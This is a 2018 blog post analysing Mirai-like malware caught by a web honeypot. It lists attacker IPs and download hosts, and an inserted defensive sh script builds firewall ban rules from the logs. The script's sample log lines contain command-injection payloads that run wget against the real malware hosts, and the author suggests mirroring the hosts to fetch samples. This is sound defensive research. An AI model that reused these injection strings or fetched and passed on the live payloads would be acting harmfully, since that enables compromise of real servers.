Saturday, 21 July 2018

Reading malware - your sister

In the meantime I decided to check again whether there is anything 'new' in the logs of one of the honeypots I set up some time ago. Below you will find a few details from the journey...

When I was reading the logs from my WWW server I found an 'old and known' string, but this time coming from 'new' (attacker) IP(s):

One more screen with IP(s):


As you can see there are a few IPs, but they all ask the same 2 hosts for the file. So we now have:

-- hxxp://g;mariokartayy;com
-- hxxp://104;244;72;82

The next step (after I downloaded the file referenced in the logged request) was to read it ;)


So we found a sister, everybody! ;D

I decided to 'beautify' the code a little bit:


Now it's better ;]

Checking:


Some more results from the strings tool:


At this stage I decided to google a little bit. I used the string from the malware request (the XML part with the <NewStatusUrl code), and that's how I found some weird pastebin link:


According to the date the script is still 'fresh':





Reading the source you will find the line mentioned before:


I don't know why it's still on pastebin... Anyway, looking through the other source code available there you will find more weird tools, for example:

Well...

I would like to add one thing here: do not use those tools. Using them will probably be illegal.
Do only legal things.

At this stage I decided to get back to my shell and prepare a small bash script to automate the process of 'checking logs' and dropping 'bad guys' a bit ;)

For now we will have to ban our 'winners' on the firewall(s):

[+]  156.196.247.242
242.247.196.156.in-addr.arpa domain name pointer host-156.196.242.247-static.tedata.net.
Country:        MU
country:        EG
--
[+]  156.199.87.116
116.87.199.156.in-addr.arpa domain name pointer host-156.199.116.87-static.tedata.net.
Country:        MU
country:        EG
--
[+]  156.201.76.26
26.76.201.156.in-addr.arpa domain name pointer host-156.201.26.76-static.tedata.net.
Country:        MU
country:        EG
--
[+]  156.220.219.222
222.219.220.156.in-addr.arpa domain name pointer host-156.220.222.219-static.tedata.net.
Country:        MU
country:        EG
--
[+]  197.33.174.107
107.174.33.197.in-addr.arpa domain name pointer host-197.33.174.107.tedata.net.
country:        EG
--
[+]  41.47.40.149
149.40.47.41.in-addr.arpa domain name pointer host-41.47.40.149.tedata.net.
country:        EG
--
[+]  92.4.84.196
196.84.4.92.in-addr.arpa domain name pointer host-92-4-84-196.as43234.net.
country:        GB
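As an added example (this is not the script from the post, whose contents are not shown here), the following POSIX sh sketch does the two jobs the paragraph above describes: it pulls the client IPs that requested the known payload out of an access log and emits firewall DROP rules for them. The combined log format, the IoC pattern (built from the <NewStatusUrl string and the two download hosts named earlier) and the sample log lines are my assumptions; the reverse DNS and country lookups visible in the output above are left out because they need network access.

```sh
#!/bin/sh
# Added example, not the blog author's script. Two stages of a
# "check logs and drop bad guys" helper: pick the client IPs that asked for
# the known payload out of an access log, then turn them into firewall rules
# that are printed for review rather than applied blindly.
#
# Assumptions (not stated on the page): combined log format with the client
# IP as the first field, and the IoC strings below, taken from the post
# (the NewStatusUrl tag and the two download hosts, written un-defanged).
IOC_PATTERN='NewStatusUrl|g\.mariokartayy\.com|104\.244\.72\.82'

# Constructed sample log lines (documentation IP ranges, not real traffic),
# so the script can be exercised offline.
SAMPLE_LOG='192.0.2.10 - - [21/Jul/2018:10:00:01 +0000] "GET /?cmd=wget%20http://g.mariokartayy.com/x.sh HTTP/1.1" 400 0 "-" "-"
198.51.100.7 - - [21/Jul/2018:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [21/Jul/2018:10:01:00 +0000] "POST / <NewStatusUrl>$(wget 104.244.72.82/x)</NewStatusUrl> HTTP/1.1" 404 210 "-" "-"
192.0.2.10 - - [21/Jul/2018:10:02:11 +0000] "GET /?cmd=wget%20http://104.244.72.82/x.sh HTTP/1.1" 400 0 "-" "-"'

# Stage 1: read access-log lines on stdin and print the unique client IPs of
# requests matching the IoC pattern. The final grep keeps only well-formed
# IPv4 literals, so a log field forged to look like a shell fragment never
# reaches the rule builder.
extract_attacker_ips() {
    grep -E -i "$IOC_PATTERN" \
        | awk '{ print $1 }' \
        | grep -E '^[0-9]{1,3}(\.[0-9]{1,3}){3}$' \
        | sort -u
}

# Stage 2: read one IP per line on stdin and print an iptables DROP rule for
# each. Rules are printed, not executed, so they can be reviewed (and checked
# against an allow-list of your own addresses) before they touch the firewall.
build_drop_rules() {
    while read -r ip; do
        printf 'iptables -I INPUT -s %s -j DROP\n' "$ip"
    done
}

# Convenience wrapper: produce the rule list for a whole log file.
# Real use: ban_list_from_log /var/log/apache2/access.log
ban_list_from_log() {
    extract_attacker_ips < "$1" | build_drop_rules
}

# Demo on the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | extract_attacker_ips | build_drop_rules
```

Printing the rules instead of piping them straight into iptables is deliberate: the honeypot will also log scanners that never fetched anything, and one overly broad IoC pattern would otherwise lock out legitimate clients with no chance to look first.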

Last view from IDA, checking the strings again:


Following the selected line should get you here:


Cool, as we can see the code is prepared to check 3 variants in order to run further downloads...

(At the time of writing this post, other binaries, like yeet, were not available for download, but if you would like to get a fresh sample, use wget --mirror. Maybe you will find something interesting to check ;))

I tried to read a few of the samples I found (in IDA), but in my opinion the best one to check is arm7.gemini:

 

As this sample (case) is already described online, I will leave it for you to play with and do some research of your own.

Good resources (that I found during the analysis) are available here:
- thanks to SeeBug
- thanks to Fortinet
- thanks to CheckPoint
 
See you next time ;)

Cheers
o/

